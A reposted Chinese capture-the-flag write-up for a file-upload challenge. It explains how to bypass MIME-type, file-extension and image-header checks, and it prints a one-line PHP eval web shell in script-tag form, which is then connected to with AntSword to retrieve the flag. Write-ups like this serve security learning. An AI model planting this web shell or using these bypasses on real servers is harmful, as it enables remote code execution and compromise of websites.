微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

[极客大挑战 2019]Upload 1

进入可以看到,这时一道文件上传题目


直接上传test.PHP



提示Not image不是图片,可能是MIME绕过,尝试抓包修改Content-Type



提示Not PHP,猜测可能是检测后缀名不能是PHP,将test.PHP改名为test.phtml进行上传


根据上传提示,不能有<?应该是检查了我们的文件内容
可是使用script脚本的木马,只需要将language修改PHP即可

<script language="PHP">@eval($_POST['cmd']);</script>


这次直接提示我们不是一个图片,检查了我们的文件内容
文件头中加入GIF89,尝试绕过图片检测

@H_502_67@


可以看到文件上传成功,那么文件上传到了哪里呢?一般认就是upload目录,有些可以在源代码中看到上传地址
访问上传的木马


查看源代码可以看到,木马已经被当做PHP执行,直接使用蚁剑连接木马


测试连接成功,右键查看flag



使用知识点:

MIME绕过
phtml、PHP3等后缀解析为PHP
javascript脚本language属性设置解析PHP
GIF89绕过检测文件是否为图片函数

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。

相关推荐